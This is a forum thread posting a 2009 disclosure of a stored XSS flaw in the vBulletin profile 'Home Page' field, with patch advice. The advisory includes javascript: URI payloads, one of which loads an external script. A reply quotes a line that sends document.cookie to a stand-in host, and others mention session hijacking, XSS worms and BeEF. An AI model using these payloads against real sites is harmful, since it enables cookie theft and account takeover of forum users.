vBulletin 3.8.4 - Cross Site Script Redirection

**MaXe** · 8th October 2009, 13:38

vBulletin - Cross Site Script Redirection

Versions Affected: 3.8.4 / 3.7.6 / 3.6.12
Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This could allow an attacker to carry out an action as a user or obtain
access to a user's account. To resolve this issue, it has been necessary to
release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases - simply
download the patch from the Members Area, extract the files and upload to
your webserver, overwriting the existing files. There is no upgrade script
required.

As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft?)

Researched & Disclosed by: MaXe (InterN0T.net)

References:
http://www.vbulletin.com/forum/showthread.php?t=319572

The Advisory

The "Home Page" field in the user profile was only checking the user input
for either "www" or the following regular expression written in normal text:
Any letter from A to Z and/or a number from 0-9 + :// will make the link valid.

The output in the Home Page field is encoded with most likely htmlspecialchars(),
however before the patch it did not check if a user would create a link that
would send an unknowing user to either the data: or javascript URI scheme.

The only limits in the Home Page field are:
- 90 character limit
- Characters will be converted to html entities.
- We can only use the data or javascript URI scheme.

This means that we should avoid " since that becomes " .. The other
characters like < will become < which is %3C which is almost the same.
Please see how htmlentities() and htmlspecialchars() works in PHP.

The following scheme input as home page will alert 0:
javascript://%0adocument.write('<script>alert(0)</script>')

The following scheme is a Proof of Concept that external Javascript can be loaded:
javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>')

The following URL contains a working Proof of Concept on the Contact Page:
http://forum.intern0t.net/members/maxe.html (will be removed soon)

Solution
Update to the newest version of vBulletin - 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

Conclusion
vBulletin is generally a safe and secure platform to use for large forums.
This security hole / exploit is implausible to actually work against people.
Please see: http://forum.intern0t.net/blogs/maxe...scripting.html for more information!

Disclosure Information:
- Unknown date of when the vendor found the security hole.
- Vendor released patch on the 7th October 2009.
- Security hole researched and disclosed on 8th October 2009.

All of the best,
MaXe

**System** · 9th October 2009, 00:53

O_O shweet find! lol

/pwn going around everywhere

**zero** · 12th November 2009, 09:47

so ?
how to hack vbulletin?? :D

**Norph** · 12th November 2009, 09:59

Read the post. The version of vBulleting is vulnerable to XSS.
Read up on XSS. ;)

**zero** · 13th November 2009, 13:51

what we can do with XSS ?
just cookie stealer or else?

**ccoder** · 13th November 2009, 23:06

cookie stealing and sesson hijacking are the most dangerous one !

but there are more ! like coding xss worm , or making ddos by persistance xss !

also there are some powerfull tools like BeEF .

google it ;)

**Neo139** · 16th May 2010, 23:29

I was checking this bug and even if we use a js file with a code like
window.location="http://yourpage.com/bob.php?q="+document.cookie;
it will only send bblastvisit=value1; bblastactivity=value2
because bbsessionhash cookie is sent by vbulletin as HttpOnly. We can't access to it through clientside (tested with FF 3.6.4 and IE 6.0)

**MaXe** · 19th May 2010, 16:19

Originally Posted by Neo139

I was checking this bug and even if we use a js file with a code like
window.location="http://yourpage.com/bob.php?q="+document.cookie;
it will only send bblastvisit=value1; bblastactivity=value2
because bbsessionhash cookie is sent by vbulletin as HttpOnly. We can't access to it through clientside (tested with FF 3.6.4 and IE 6.0)

That doesn't necessarily mean that you cannot hack a user though

Thanks for the information though :)